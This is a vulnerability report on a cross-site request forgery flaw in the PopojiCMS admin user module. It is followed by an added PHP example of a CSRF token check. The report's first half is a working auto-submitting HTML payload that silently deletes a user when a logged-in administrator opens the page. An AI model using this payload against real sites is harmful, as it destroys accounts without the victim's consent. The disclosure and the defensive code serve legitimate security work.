One: use a CSRF vulnerability to delete a user
Vulnerability details:
When the administrator logs in, opening the webpage will automatically delete the specified user.
Vulnerability URL: http://127.0.0.1/popojicms/po-admin/admin.php?mod=user
Vulnerability POC:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>OWASP CRSFTester Demonstration</title>
</head>
<body onload="javascript:fireForms()">
<script language="JavaScript">
var pauses = new Array("7", "7", "10");

function pausecomp(millis) {
    var date = new Date();
    var curDate = null;
    do { curDate = new Date(); } while (curDate - date < millis);
}

function fireForms() {
    var count = 3;
    var i = 0;
    for (i = 0; i < count; i++) {
        document.forms[i].submit();
        pausecomp(pauses[i]);
    }
}
</script>
<H2>OWASP CRSFTester Demonstration</H2>
<form method="POST" name="form0" action="http://127.0.0.1:80/popojicms/po-admin/route.php?mod=user&act=multidelete">
<input type="hidden" name="totaldata" value="1"/>
<input type="hidden" name="table-user_length" value="10"/>
<input type="hidden" name="item[0][deldata]" value="5"/>
</form>
<form method="GET" name="form1" action="http://127.0.0.1:80/popojicms/po-admin/admin.php?mod=user">
<input type="hidden" name="name" value="value"/>
</form>
</body>
</html>
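The multidelete request above carries nothing that the administrator's own page would have and a third-party page would not. The following is an added example, not part of the original report and not PopojiCMS code, of a synchronizer-token check a state-changing handler could apply before acting; the function names and the `csrf_token` field name are assumptions.

```php
<?php
// Added example, not PopojiCMS code: synchronizer-token CSRF guard for a
// state-changing admin action. All function names here are hypothetical.
declare(strict_types=1);

// Issue (or reuse) a per-session token; embed it in every admin form.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Accept a request only if it is a POST carrying the session's token.
function csrf_check(array $session, string $method, array $post): bool
{
    if ($method !== 'POST') {
        return false;                           // no state changes over GET
    }
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    return is_string($supplied) && $expected !== ''
        && hash_equals($expected, $supplied);   // constant-time compare
}

// Constructed requests: the first mirrors the fields of the auto-submitting
// form in the report (no token); the second adds the token that a form
// rendered by the admin page itself would include.
$session = [];                                  // stands in for $_SESSION
$token   = csrf_token($session);
$forged  = ['totaldata' => '1', 'item' => [['deldata' => '5']]];
$genuine = $forged + ['csrf_token' => $token];

foreach (['forged' => $forged, 'genuine' => $genuine] as $label => $post) {
    $ok = csrf_check($session, 'POST', $post);
    echo $label, ': ', $ok ? "accepted\n" : "rejected (HTTP 403)\n";
}
```

In a real handler the check runs before any database write, with `$_SESSION`, `$_SERVER['REQUEST_METHOD']` and `$_POST` as arguments; setting the session cookie's `SameSite` attribute to `Lax` or `Strict` is a complementary control.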